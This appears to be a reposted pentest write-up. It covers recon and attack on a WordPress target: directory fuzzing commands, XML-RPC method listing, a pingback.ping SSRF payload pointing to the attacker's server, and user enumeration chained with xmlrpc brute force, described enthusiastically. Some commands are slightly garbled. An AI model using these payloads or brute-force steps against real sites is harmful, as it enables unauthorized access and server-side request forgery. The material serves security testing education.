BOOK THIS SPACE FOR AD
ARTICLE ADHello everyone, I hope you all are doing great.
I am back with another writeup.
It is a write-up about some of my findings so let’s start.
This time a project came that has a very small scope and has only one URL inside it let’s say www.victim.com.
Now for the first step, we started to gather all the information we could get.
So the First step was to determine the technologies and webserver for which we used wappalyzer.
Now lets locate some of the files like /robots.txt , /crossdomain.xml /clientaccesspolicy.xml /sitemap.xml and /.well-known/
So let’s move to our next step which is Directory Enumeration and fuzzing for that, I use a bunch of tools.
dirhunt https://victim.com/
hakrawler -domain https://victim.com/
gospider -s “https://victim.com/" -o output -c 10 -d 1
gospider -S sites.txt -o output -c 10 -d 1
gospider -s “https://victim.com/" -o output -c 10 -d 1 — other-source — include-subs
ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w OneListForAll/onelistforall.txt -u https://lvictim.com/FUZZ
gau victim.com | unfurl -u paths sed ‘s#/#\n#g’ paths.txt |sort -u
gau victim.com | unfurl -u keys
gau victim.com | head -n 1000 |fff -s 200 -s 404
You can use many more.
From these I get a bunch of directories and files so let’s start our exploit phase. We will discuss recon some other day.
Then from this, I got to know that the website was using WordPress. And now I started to look for all the vulnerabilities that can be present.
Lets discus them all
To detect this you can just visit www.victim.com/xmlrpc.php and the page will show the error message of only accepting POST requests.
let’s exploit this one
So first capture the request in Burp and change the method from GET to POST.
Now List the methods with
<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
Perform SSRF with
<methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<Some Valid Location ></string> </value></param></params> </methodCall>
On visiting www.victim.com/wp-json/wp/v2/users we were able to see the users
When you’ve got both xmlrpc.php and user enumeration at your disposal, it’s like having a potent combination in your hacking arsenal. Picture this: you’re not just limited to exploring user details through wp-json, but you can elevate your game by launching a strategic brute force attack via xmlrpc.php.
With xmlrpc.php, you’re not just passively gathering information; you’re actively engaging with the WordPress site, probing for vulnerabilities, and flexing your skills to potentially gain unauthorized access. And when you add user enumeration into the mix, it’s like adding fuel to the fire, intensifying your efforts and magnifying the impact of your attack.
By chaining these two techniques together, you’re not only demonstrating extra effort and sophistication, but you’re also significantly increasing your chances of success. It’s a thrilling endeavor, pushing the boundaries of what’s possible in the realm of cybersecurity. So buckle up and get ready for an exhilarating ride as you embark on this exciting hacking adventure!
If you want to read more visit us